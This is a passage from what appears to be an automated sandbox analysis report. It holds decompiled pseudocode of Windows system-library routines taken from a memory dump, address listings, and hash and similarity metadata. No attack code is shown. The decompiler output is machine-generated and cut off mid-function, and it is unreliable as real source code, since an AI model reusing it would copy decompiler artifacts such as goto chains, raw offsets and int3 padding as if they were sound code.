                        								_t294 = _a4;
                        								__eflags = _t294;
                        								if(_t294 != 0) {
                        									_v36 = _t294;
                        									__eflags =  *_t294 - _t323;
                        									if( *_t294 == _t323) {
                        										_t330 = 0xc0000100;
                        										goto L76;
                        									} else {
                        										_t311 =  *((intOrPtr*)(_v44 + 0x30));
                        										_t248 =  *((intOrPtr*)(_t311 + 0x10));
                        										__eflags =  *((intOrPtr*)(_t248 + 0x48)) - _t294;
                        										if( *((intOrPtr*)(_t248 + 0x48)) == _t294) {
                        											__eflags =  *(_t311 + 0x1c);
                        											if( *(_t311 + 0x1c) == 0) {
                        												L106:
                        												_t330 = E02BC2AE4( &_v36, _a8, _t283, _a16, _a20, _a24);
                        												_v32 = _t330;
                        												__eflags = _t330 - 0xc0000100;
                        												if(_t330 != 0xc0000100) {
                        													goto L69;
                        												} else {
                        													_t323 = 1;
                        													_t294 = _v36;
                        													goto L75;
                        												}
                        											} else {
                        												_t251 = E02BA6600( *(_t311 + 0x1c));
                        												__eflags = _t251;
                        												if(_t251 != 0) {
                        													goto L106;
                        												} else {
                        													_t294 = _a4;
                        													goto L75;
                        												}
                        											}
                        										} else {
                        											L75:
                        											_t330 = E02BC2C50(_t294, _a8, _t283, _a16, _a20, _a24, _t323);
                        											L76:
                        											_v32 = _t330;
                        											goto L69;
                        										}
                        									}
                        									goto L108;
                        								} else {
                        									E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        									_v8 = 1;
                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                        									_t330 = _a24;
                        									_t258 = E02BC2AE4( &_v36, _a8, _t283, _a16, _a20, _t330);
                        									_v32 = _t258;
                        									__eflags = _t258 - 0xc0000100;
                        									if(_t258 == 0xc0000100) {
                        										_v32 = E02BC2C50(_v36, _a8, _t283, _a16, _a20, _t330, 1);
                        									}
                        									_v8 = _t323;
                        									E02BC2ACB();
                        								}
                        							}
                        						}
                        						L69:
                        						_v8 = 0xfffffffe;
                        						_t244 = _t330;
                        					}
                        					L70:
                        					return E02BED0D1(_t244);
                        				}
                        				L108:
                        			}



















































                        0x02bc281e
                        0x02bc2821
                        0x02bc2823
                        0x00000000
                        0x02bc2829
                        0x02bc2829
                        0x02bc2831
                        0x02bc283c
                        0x02bc283e
                        0x00000000
                        0x02bc283e
                        0x00000000
                        0x00000000
                        0x02bc284e
                        0x02bc2850
                        0x02bc2851
                        0x02bc2854
                        0x02bc2857
                        0x02bc285a
                        0x02bc285c
                        0x02bc285d
                        0x00000000
                        0x00000000
                        0x02bc275d
                        0x02bc2761
                        0x00000000
                        0x02bc2767
                        0x02bc276e
                        0x02bc2773
                        0x02bc2773
                        0x02bc2776
                        0x02bc2778
                        0x02bc277e
                        0x02bc277e
                        0x02bc2781
                        0x02bc2781
                        0x02bc2783
                        0x02bc2784
                        0x00000000
                        0x00000000
                        0x02c05bd8
                        0x02c05bde
                        0x02c05be4
                        0x02c05be6
                        0x02c05be8
                        0x02c05be9
                        0x02c05bee
                        0x02c05bf8
                        0x02c05bff
                        0x02c05c01
                        0x02c05c04
                        0x02c05c07
                        0x02c05c0b
                        0x02c05c0d
                        0x02c05c0d
                        0x02c05c15
                        0x02c05c18
                        0x02c05c1b
                        0x02c05c1b
                        0x02c05c1e
                        0x00000000
                        0x00000000
                        0x02bc28c3
                        0x02bc28c8
                        0x02bc28d2
                        0x02bc28d4
                        0x02bc28d8
                        0x02bc28db
                        0x02c05c26
                        0x02c05c28
                        0x02c05c2d
                        0x02c05c2d
                        0x00000000
                        0x00000000
                        0x02c05c34
                        0x02c05c36
                        0x02c05c49
                        0x02c05c4e
                        0x02c05c54
                        0x02c05c5b
                        0x02c05c5d
                        0x02c05c60
                        0x02bc2788
                        0x02bc2788
                        0x02bc278b
                        0x02bc278e
                        0x02bc278e
                        0x02bc278e
                        0x02bc2791
                        0x00000000
                        0x00000000
                        0x02bc2756
                        0x02bc2750
                        0x00000000
                        0x02bc2794
                        0x02bc2794
                        0x02bc2795
                        0x02bc2798
                        0x02bc2798
                        0x00000000
                        0x02bc2734
                        0x02bc272c
                        0x02bc2700
                        0x02bc25ef
                        0x02bc25ef
                        0x02bc25ef
                        0x02bc25f2
                        0x02bc25f8
                        0x00000000
                        0x00000000
                        0x02bc25fe
                        0x00000000
                        0x02bc28e6
                        0x02bc28ec
                        0x02bc28ef
                        0x02bc28f5
                        0x02bc28f8
                        0x02bc28f8
                        0x00000000
                        0x02bc28f8
                        0x00000000
                        0x00000000
                        0x02bc2866
                        0x02bc2866
                        0x02bc2876
                        0x02bc2879
                        0x00000000
                        0x00000000
                        0x02bc27e0
                        0x02bc27e7
                        0x02bc27e9
                        0x02bc27eb
                        0x02c05afd
                        0x00000000
                        0x02c05afd
                        0x00000000
                        0x00000000
                        0x02bc2633
                        0x02bc2638
                        0x02bc263b
                        0x02bc263c
                        0x02bc263e
                        0x02bc2640
                        0x02bc2642
                        0x02bc2647
                        0x02bc2649
                        0x02bc264e
                        0x02bc2650
                        0x02bc2653
                        0x02bc2659
                        0x02bc26a2
                        0x02bc26a7
                        0x02bc26ac
                        0x02bc26b2
                        0x02c05b11
                        0x02c05b15
                        0x02c05b17
                        0x00000000
                        0x02bc26b8
                        0x02bc26b8
                        0x02bc26ba
                        0x02bc27a6
                        0x02bc27a6
                        0x02bc27a9
                        0x02bc27ab
                        0x02bc27b9
                        0x02bc27b9
                        0x02bc27be
                        0x02bc27c1
                        0x02bc27c3
                        0x02bc27c5
                        0x02bc27c7
                        0x02c05c74
                        0x02c05c79
                        0x02c05c79
                        0x02bc27c7
                        0x00000000
                        0x02bc26c0
                        0x02bc26c0
                        0x02bc26c3
                        0x02bc26c6
                        0x02bc26c6
                        0x02bc26c9
                        0x02bc26c9
                        0x00000000
                        0x02bc26c9
                        0x02bc26ba
                        0x02bc265b
                        0x02bc265b
                        0x02bc265e
                        0x02bc2667
                        0x02bc266d
                        0x02bc2677
                        0x02bc267c
                        0x02bc267f
                        0x02bc2681
                        0x02c05b49
                        0x02c05b4e
                        0x02bc27cd
                        0x02bc27d0
                        0x02bc27d1
                        0x02bc27d2
                        0x02bc27d4
                        0x02bc27dd
                        0x02bc2687
                        0x02bc2687
                        0x02bc268a
                        0x02bc268b
                        0x02bc268e
                        0x02bc268f
                        0x02bc2691
                        0x02bc2696
                        0x02bc2698
                        0x02bc269d
                        0x02bc269f
                        0x00000000
                        0x02bc269f
                        0x02bc2681
                        0x00000000
                        0x00000000
                        0x02bc2846
                        0x00000000
                        0x00000000
                        0x02bc2605
                        0x02bc260a
                        0x02bc260c
                        0x02bc2611
                        0x02bc2616
                        0x02bc2619
                        0x02bc2619
                        0x02bc261e
                        0x00000000
                        0x02bc2624
                        0x02bc2627
                        0x02bc2627
                        0x00000000
                        0x00000000
                        0x02c05b1f
                        0x00000000
                        0x00000000
                        0x02bc2894
                        0x02bc289b
                        0x02bc289d
                        0x02bc28a1
                        0x02c05b2b
                        0x02c05b2e
                        0x02c05b2e
                        0x02bc28a7
                        0x02bc28a9
                        0x02c05b04
                        0x02c05b09
                        0x02c05b09
                        0x02c05b09
                        0x00000000
                        0x00000000
                        0x02c05b35
                        0x02c05b3c
                        0x02bc28fb
                        0x02bc28fb
                        0x02bc26cc
                        0x02bc26cc
                        0x02bc26d0
                        0x00000000
                        0x02bc26d2
                        0x02bc26d2
                        0x00000000
                        0x02bc26d2
                        0x00000000
                        0x00000000
                        0x02bc25fe
                        0x02bc292d
                        0x02bc2930
                        0x02bc2935
                        0x02bc293e
                        0x02bc2944
                        0x02bc294e
                        0x02bc294f
                        0x02bc2952
                        0x02bc2962
                        0x02bc296b
                        0x02bc2972
                        0x02bc2973
                        0x02bc2976
                        0x02bc297d
                        0x02bc297e
                        0x02bc297f
                        0x02bc2980
                        0x02bc2981
                        0x02bc2982
                        0x02bc2983
                        0x02bc2984
                        0x02bc2985
                        0x02bc2986
                        0x02bc2987
                        0x02bc2988
                        0x02bc2989
                        0x02bc298a
                        0x02bc298b
                        0x02bc298c
                        0x02bc298d
                        0x02bc298e
                        0x02bc298f
                        0x02bc2990
                        0x02bc2992
                        0x02bc2997
                        0x02bc29a3
                        0x02bc29a6
                        0x02bc29ab
                        0x02bc29ad
                        0x02bc29b0
                        0x02bc29b2
                        0x02c05c80
                        0x02bc29b8
                        0x02bc29b8
                        0x02bc29bb
                        0x02bc29c0
                        0x02bc29c5
                        0x02bc29c6
                        0x02bc29c6
                        0x02bc29c9
                        0x02bc29cb
                        0x00000000
                        0x00000000
                        0x02bc29cd
                        0x02bc29d0
                        0x02bc29d9
                        0x02bc29db
                        0x02bc29dd
                        0x02bc2a7f
                        0x02bc2a84
                        0x02bc2a87
                        0x02bc2a89
                        0x02c05ca1
                        0x02c05ca3
                        0x00000000
                        0x02bc2a8f
                        0x02bc2a8f
                        0x00000000
                        0x02bc2a8f
                        0x00000000
                        0x02bc29e3
                        0x02bc29e3
                        0x02bc29e3
                        0x00000000
                        0x02bc29e3
                        0x02bc29dd
                        0x00000000
                        0x02bc29db
                        0x02bc29e6
                        0x02bc29e9
                        0x02bc29eb
                        0x02bc29ed
                        0x02bc29f3
                        0x02bc29f5
                        0x02bc29f8
                        0x02bc29fa
                        0x02bc2a97
                        0x02bc2a9a
                        0x02bc2a9d
                        0x02bc2add
                        0x00000000
                        0x02bc2a9f
                        0x02bc2aa2
                        0x02bc2aa5
                        0x02bc2aa8
                        0x02bc2aab
                        0x02c05cab
                        0x02c05caf
                        0x02c05cc5
                        0x02c05cda
                        0x02c05cdc
                        0x02c05cdf
                        0x02c05ce5
                        0x00000000
                        0x02c05ceb
                        0x02c05ced
                        0x02c05cee
                        0x00000000
                        0x02c05cee
                        0x02c05cb1
                        0x02c05cb4
                        0x02c05cb9
                        0x02c05cbb
                        0x00000000
                        0x02c05cbd
                        0x02c05cbd
                        0x00000000
                        0x02c05cbd
                        0x02c05cbb
                        0x02bc2ab1
                        0x02bc2ab1
                        0x02bc2ac4
                        0x02bc2ac6
                        0x02bc2ac6
                        0x00000000
                        0x02bc2ac6
                        0x02bc2aab
                        0x00000000
                        0x02bc2a00
                        0x02bc2a09
                        0x02bc2a0e
                        0x02bc2a21
                        0x02bc2a24
                        0x02bc2a35
                        0x02bc2a3a
                        0x02bc2a3d
                        0x02bc2a42
                        0x02bc2a59
                        0x02bc2a59
                        0x02bc2a5c
                        0x02bc2a5f
                        0x02bc2a5f
                        0x02bc29fa
                        0x02bc29f3
                        0x02bc2a64
                        0x02bc2a64
                        0x02bc2a6b
                        0x02bc2a6b
                        0x02bc2a6d
                        0x02bc2a72
                        0x02bc2a72
                        0x00000000

                        Strings
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: PATH
                        • API String ID: 0-1036084923
                        • Opcode ID: 2d90630edf667038575000402b284cf3eb2ee9784fd76e118d5ce93a39017ff1
                        • Instruction ID: 2abbbed5311e4c3811b3bdf733c3653ef8c7b7ce2de476e6d27b0316614d936f
                        • Opcode Fuzzy Hash: 2d90630edf667038575000402b284cf3eb2ee9784fd76e118d5ce93a39017ff1
                        • Instruction Fuzzy Hash: 80C19EB5E00219DBDB15DF98D890BBDB7B1FF48744F6481A9E801AB250E774AD41CB60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 80%
                        			E02BCFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                        				char _v5;
                        				signed int _v8;
                        				signed int _v12;
                        				char _v16;
                        				char _v17;
                        				char _v20;
                        				signed int _v24;
                        				char _v28;
                        				char _v32;
                        				signed int _v40;
                        				void* __ecx;
                        				void* __edi;
                        				void* __ebp;
                        				signed int _t73;
                        				intOrPtr* _t75;
                        				signed int _t77;
                        				signed int _t79;
                        				signed int _t81;
                        				intOrPtr _t83;
                        				intOrPtr _t85;
                        				intOrPtr _t86;
                        				signed int _t91;
                        				signed int _t94;
                        				signed int _t95;
                        				signed int _t96;
                        				signed int _t106;
                        				signed int _t108;
                        				signed int _t114;
                        				signed int _t116;
                        				signed int _t118;
                        				signed int _t122;
                        				signed int _t123;
                        				void* _t129;
                        				signed int _t130;
                        				void* _t132;
                        				intOrPtr* _t134;
                        				signed int _t138;
                        				signed int _t141;
                        				signed int _t147;
                        				intOrPtr _t153;
                        				signed int _t154;
                        				signed int _t155;
                        				signed int _t170;
                        				void* _t174;
                        				signed int _t176;
                        				signed int _t177;
                        
                        				_t129 = __ebx;
                        				_push(_t132);
                        				_push(__esi);
                        				_t174 = _t132;
                        				_t73 =  !( *( *(_t174 + 0x18)));
                        				if(_t73 >= 0) {
                        					L5:
                        					return _t73;
                        				} else {
                        					E02BAEEF0(0x2c87b60);
                        					_t134 =  *0x2c87b84; // 0x77ad7b80
                        					_t2 = _t174 + 0x24; // 0x24
                        					_t75 = _t2;
                        					if( *_t134 != 0x2c87b80) {
                        						_push(3);
                        						asm("int 0x29");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						asm("int3");
                        						_push(0x2c87b60);
                        						_t170 = _v8;
                        						_v28 = 0;
                        						_v40 = 0;
                        						_v24 = 0;
                        						_v17 = 0;
                        						_v32 = 0;
                        						__eflags = _t170 & 0xffff7cf2;
                        						if((_t170 & 0xffff7cf2) != 0) {
                        							L43:
                        							_t77 = 0xc000000d;
                        						} else {
                        							_t79 = _t170 & 0x0000000c;
                        							__eflags = _t79;
                        							if(_t79 != 0) {
                        								__eflags = _t79 - 0xc;
                        								if(_t79 == 0xc) {
                        									goto L43;
                        								} else {
                        									goto L9;
                        								}
                        							} else {
                        								_t170 = _t170 | 0x00000008;
                        								__eflags = _t170;
                        								L9:
                        								_t81 = _t170 & 0x00000300;
                        								__eflags = _t81 - 0x300;
                        								if(_t81 == 0x300) {
                        									goto L43;
                        								} else {
                        									_t138 = _t170 & 0x00000001;
                        									__eflags = _t138;
                        									_v24 = _t138;
                        									if(_t138 != 0) {
                        										__eflags = _t81;
                        										if(_t81 != 0) {
                        											goto L43;
                        										} else {
                        											goto L11;
                        										}
                        									} else {
                        										L11:
                        										_push(_t129);
                        										_t77 = E02BA6D90( &_v20);
                        										_t130 = _t77;
                        										__eflags = _t130;
                        										if(_t130 >= 0) {
                        											_push(_t174);
                        											__eflags = _t170 & 0x00000301;
                        											if((_t170 & 0x00000301) == 0) {
                        												_t176 = _a8;
                        												__eflags = _t176;
                        												if(__eflags == 0) {
                        													L64:
                        													_t83 =  *[fs:0x18];
                        													_t177 = 0;
                        													__eflags =  *(_t83 + 0xfb8);
                        													if( *(_t83 + 0xfb8) != 0) {
                        														E02BA76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                        													}
                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                        													goto L15;
                        												} else {
                        													asm("sbb edx, edx");
                        													_t114 = E02C38938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                        													__eflags = _t114;
                        													if(_t114 < 0) {
                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                        														E02B9B150();
                        													}
                        													_t116 = E02C36D81(_t176,  &_v16);
                        													__eflags = _t116;
                        													if(_t116 >= 0) {
                        														__eflags = _v16 - 2;
                        														if(_v16 < 2) {
                        															L56:
                        															_t118 = E02BA75CE(_v20, 5, 0);
                        															__eflags = _t118;
                        															if(_t118 < 0) {
                        																L67:
                        																_t130 = 0xc0000017;
                        																goto L32;
                        															} else {
                        																__eflags = _v12;
                        																if(_v12 == 0) {
                        																	goto L67;
                        																} else {
                        																	_t153 =  *0x2c88638; // 0x0
                        																	_t122 = L02BA38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                        																	_t154 = _v12;
                        																	_t130 = _t122;
                        																	__eflags = _t130;
                        																	if(_t130 >= 0) {
                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                        																		__eflags = _t123;
                        																		if(_t123 != 0) {
                        																			_t155 = _a12;
                        																			__eflags = _t155;
                        																			if(_t155 != 0) {
                        																				 *_t155 = _t123;
                        																			}
                        																			goto L64;
                        																		} else {
                        																			E02BA76E2(_t154);
                        																			goto L41;
                        																		}
                        																	} else {
                        																		E02BA76E2(_t154);
                        																		_t177 = 0;
                        																		goto L18;
                        																	}
                        																}
                        															}
                        														} else {
                        															__eflags =  *_t176;
                        															if( *_t176 != 0) {
                        																goto L56;
                        															} else {
                        																__eflags =  *(_t176 + 2);
                        																if( *(_t176 + 2) == 0) {
                        																	goto L64;
                        																} else {
                        																	goto L56;
                        																}
                        															}
                        														}
                        													} else {
                        														_t130 = 0xc000000d;
                        														goto L32;
                        													}
                        												}
                        												goto L35;
                        											} else {
                        												__eflags = _a8;
                        												if(_a8 != 0) {
                        													_t77 = 0xc000000d;
                        												} else {
                        													_v5 = 1;
                        													L02BCFCE3(_v20, _t170);
                        													_t177 = 0;
                        													__eflags = 0;
                        													L15:
                        													_t85 =  *[fs:0x18];
                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                        														L18:
                        														__eflags = _t130;
                        														if(_t130 != 0) {
                        															goto L32;
                        														} else {
                        															__eflags = _v5 - _t130;
                        															if(_v5 == _t130) {
                        																goto L32;
                        															} else {
                        																_t86 =  *[fs:0x18];
                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                        																}
                        																__eflags = _t177;
                        																if(_t177 == 0) {
                        																	L31:
                        																	__eflags = 0;
                        																	L02BA70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                        																	goto L32;
                        																} else {
                        																	__eflags = _v24;
                        																	_t91 =  *(_t177 + 0x20);
                        																	if(_v24 != 0) {
                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                        																		goto L31;
                        																	} else {
                        																		_t141 = _t91 & 0x00000040;
                        																		__eflags = _t170 & 0x00000100;
                        																		if((_t170 & 0x00000100) == 0) {
                        																			__eflags = _t141;
                        																			if(_t141 == 0) {
                        																				L74:
                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                        																				goto L27;
                        																			} else {
                        																				_t177 = E02BCFD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					goto L42;
                        																				} else {
                        																					_t130 = E02BCFD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						_t68 = _t177 + 0x20;
                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                        																						__eflags =  *_t68;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L74;
                        																					}
                        																				}
                        																			}
                        																			goto L35;
                        																		} else {
                        																			__eflags = _t141;
                        																			if(_t141 != 0) {
                        																				_t177 = E02BCFD22(_t177);
                        																				__eflags = _t177;
                        																				if(_t177 == 0) {
                        																					L42:
                        																					_t77 = 0xc0000001;
                        																					goto L33;
                        																				} else {
                        																					_t130 = E02BCFD9B(_t177, 0, 4);
                        																					__eflags = _t130;
                        																					if(_t130 != 0) {
                        																						goto L42;
                        																					} else {
                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                        																						_t91 =  *(_t177 + 0x20);
                        																						goto L26;
                        																					}
                        																				}
                        																				goto L35;
                        																			} else {
                        																				L26:
                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                        																				__eflags = _t94;
                        																				L27:
                        																				 *(_t177 + 0x20) = _t94;
                        																				__eflags = _t170 & 0x00008000;
                        																				if((_t170 & 0x00008000) != 0) {
                        																					_t95 = _a12;
                        																					__eflags = _t95;
                        																					if(_t95 != 0) {
                        																						_t96 =  *_t95;
                        																						__eflags = _t96;
                        																						if(_t96 != 0) {
                        																							 *((short*)(_t177 + 0x22)) = 0;
                        																							_t40 = _t177 + 0x20;
                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                        																							__eflags =  *_t40;
                        																						}
                        																					}
                        																				}
                        																				goto L31;
                        																			}
                        																		}
                        																	}
                        																}
                        															}
                        														}
                        													} else {
                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                        														_t106 =  *(_t147 + 0x20);
                        														__eflags = _t106 & 0x00000040;
                        														if((_t106 & 0x00000040) != 0) {
                        															_t147 = E02BCFD22(_t147);
                        															__eflags = _t147;
                        															if(_t147 == 0) {
                        																L41:
                        																_t130 = 0xc0000001;
                        																L32:
                        																_t77 = _t130;
                        																goto L33;
                        															} else {
                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                        																_t106 =  *(_t147 + 0x20);
                        																goto L17;
                        															}
                        															goto L35;
                        														} else {
                        															L17:
                        															_t108 = _t106 | 0x00000080;
                        															__eflags = _t108;
                        															 *(_t147 + 0x20) = _t108;
                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                        															goto L18;
                        														}
                        													}
                        												}
                        											}
                        											L33:
                        										}
                        									}
                        								}
                        							}
                        						}
                        						L35:
                        						return _t77;
                        					} else {
                        						 *_t75 = 0x2c87b80;
                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                        						 *_t134 = _t75;
                        						 *0x2c87b84 = _t75;
                        						_t73 = E02BAEB70(_t134, 0x2c87b60);
                        						if( *0x2c87b20 != 0) {
                        							_t73 =  *( *[fs:0x30] + 0xc);
                        							if( *((char*)(_t73 + 0x28)) == 0) {
                        								_t73 = E02BAFF60( *0x2c87b20);
                        							}
                        						}
                        						goto L5;
                        					}
                        				}
                        			}

                        Strings
                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 02C0BE0F
                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                        • API String ID: 0-865735534
                        • Opcode ID: a32d362633de533b4cee689faf5a9190fe2480f6bd34aa238122fe5b7e8c5692
                        • Instruction ID: a8af5cab4086b7cb8968ad556f31d2b432f99ebe154b3ae2d4ae45c2ba51626e
                        • Opcode Fuzzy Hash: a32d362633de533b4cee689faf5a9190fe2480f6bd34aa238122fe5b7e8c5692
                        • Instruction Fuzzy Hash: 4AA1F371B006469BDB25DF68C490B7AB3A6EF48718F2445EEE916DBA80DB30DD41CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 63%
                        			E02B92D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                        				signed char _v8;
                        				signed int _v12;
                        				signed int _v16;
                        				signed int _v20;
                        				signed int _v24;
                        				intOrPtr _v28;
                        				intOrPtr _v32;
                        				signed int _v52;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t55;
                        				signed int _t57;
                        				signed int _t58;
                        				char* _t62;
                        				signed char* _t63;
                        				signed char* _t64;
                        				signed int _t67;
                        				signed int _t72;
                        				signed int _t77;
                        				signed int _t78;
                        				signed int _t88;
                        				intOrPtr _t89;
                        				signed char _t93;
                        				signed int _t97;
                        				signed int _t98;
                        				signed int _t102;
                        				signed int _t103;
                        				intOrPtr _t104;
                        				signed int _t105;
                        				signed int _t106;
                        				signed char _t109;
                        				signed int _t111;
                        				void* _t116;
                        
                        				_t102 = __edi;
                        				_t97 = __edx;
                        				_v12 = _v12 & 0x00000000;
                        				_t55 =  *[fs:0x18];
                        				_t109 = __ecx;
                        				_v8 = __edx;
                        				_t86 = 0;
                        				_v32 = _t55;
                        				_v24 = 0;
                        				_push(__edi);
                        				if(__ecx == 0x2c85350) {
                        					_t86 = 1;
                        					_v24 = 1;
                        					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                        				}
                        				_t103 = _t102 | 0xffffffff;
                        				if( *0x2c87bc8 != 0) {
                        					_push(0xc000004b);
                        					_push(_t103);
                        					E02BD97C0();
                        				}
                        				if( *0x2c879c4 != 0) {
                        					_t57 = 0;
                        				} else {
                        					_t57 = 0x2c879c8;
                        				}
                        				_v16 = _t57;
                        				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                        					_t93 = _t109;
                        					L23();
                        				}
                        				_t58 =  *_t109;
                        				if(_t58 == _t103) {
                        					__eflags =  *(_t109 + 0x14) & 0x01000000;
                        					_t58 = _t103;
                        					if(__eflags == 0) {
                        						_t93 = _t109;
                        						E02BC1624(_t86, __eflags);
                        						_t58 =  *_t109;
                        					}
                        				}
                        				_v20 = _v20 & 0x00000000;
                        				if(_t58 != _t103) {
                        					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                        				}
                        				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                        				_t88 = _v16;
                        				_v28 = _t104;
                        				L9:
                        				while(1) {
                        					if(E02BB7D50() != 0) {
                        						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                        					} else {
                        						_t62 = 0x7ffe0382;
                        					}
                        					if( *_t62 != 0) {
                        						_t63 =  *[fs:0x30];
                        						__eflags = _t63[0x240] & 0x00000002;
                        						if((_t63[0x240] & 0x00000002) != 0) {
                        							_t93 = _t109;
                        							E02C2FE87(_t93);
                        						}
                        					}
                        					if(_t104 != 0xffffffff) {
                        						_push(_t88);
                        						_push(0);
                        						_push(_t104);
                        						_t64 = E02BD9520();
                        						goto L15;
                        					} else {
                        						while(1) {
                        							_t97 =  &_v8;
                        							_t64 = E02BCE18B(_t109 + 4, _t97, 4, _t88, 0);
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t93 =  *(_t109 + 4);
                        							_v8 = _t93;
                        							if((_t93 & 0x00000002) != 0) {
                        								continue;
                        							}
                        							L15:
                        							if(_t64 == 0x102) {
                        								break;
                        							}
                        							_t89 = _v24;
                        							if(_t64 < 0) {
                        								L02BEDF30(_t93, _t97, _t64);
                        								_push(_t93);
                        								_t98 = _t97 | 0xffffffff;
                        								__eflags =  *0x2c86901;
                        								_push(_t109);
                        								_v52 = _t98;
                        								if( *0x2c86901 != 0) {
                        									_push(0);
                        									_push(1);
                        									_push(0);
                        									_push(0x100003);
                        									_push( &_v12);
                        									_t72 = E02BD9980();
                        									__eflags = _t72;
                        									if(_t72 < 0) {
                        										_v12 = _t98 | 0xffffffff;
                        									}
                        								}
                        								asm("lock cmpxchg [ecx], edx");
                        								_t111 = 0;
                        								__eflags = 0;
                        								if(0 != 0) {
                        									__eflags = _v12 - 0xffffffff;
                        									if(_v12 != 0xffffffff) {
                        										_push(_v12);
                        										E02BD95D0();
                        									}
                        								} else {
                        									_t111 = _v12;
                        								}
                        								return _t111;
                        							} else {
                        								if(_t89 != 0) {
                        									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                        									_t77 = E02BB7D50();
                        									__eflags = _t77;
                        									if(_t77 == 0) {
                        										_t64 = 0x7ffe0384;
                        									} else {
                        										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                        									}
                        									__eflags =  *_t64;
                        									if( *_t64 != 0) {
                        										_t64 =  *[fs:0x30];
                        										__eflags = _t64[0x240] & 0x00000004;
                        										if((_t64[0x240] & 0x00000004) != 0) {
                        											_t78 = E02BB7D50();
                        											__eflags = _t78;
                        											if(_t78 == 0) {
                        												_t64 = 0x7ffe0385;
                        											} else {
                        												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                        											}
                        											__eflags =  *_t64 & 0x00000020;
                        											if(( *_t64 & 0x00000020) != 0) {
                        												_t64 = E02C17016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                        											}
                        										}
                        									}
                        								}
                        								return _t64;
                        							}
                        						}
                        						_t97 = _t88;
                        						_t93 = _t109;
                        						E02C2FDDA(_t97, _v12);
                        						_t105 =  *_t109;
                        						_t67 = _v12 + 1;
                        						_v12 = _t67;
                        						__eflags = _t105 - 0xffffffff;
                        						if(_t105 == 0xffffffff) {
                        							_t106 = 0;
                        							__eflags = 0;
                        						} else {
                        							_t106 =  *(_t105 + 0x14);
                        						}
                        						__eflags = _t67 - 2;
                        						if(_t67 > 2) {
                        							__eflags = _t109 - 0x2c85350;
                        							if(_t109 != 0x2c85350) {
                        								__eflags = _t106 - _v20;
                        								if(__eflags == 0) {
                        									_t93 = _t109;
                        									E02C2FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                        								}
                        							}
                        						}
                        						_push("RTL: Re-Waiting\n");
                        						_push(0);
                        						_push(0x65);
                        						_v20 = _t106;
                        						E02C25720();
                        						_t104 = _v28;
                        						_t116 = _t116 + 0xc;
                        						continue;
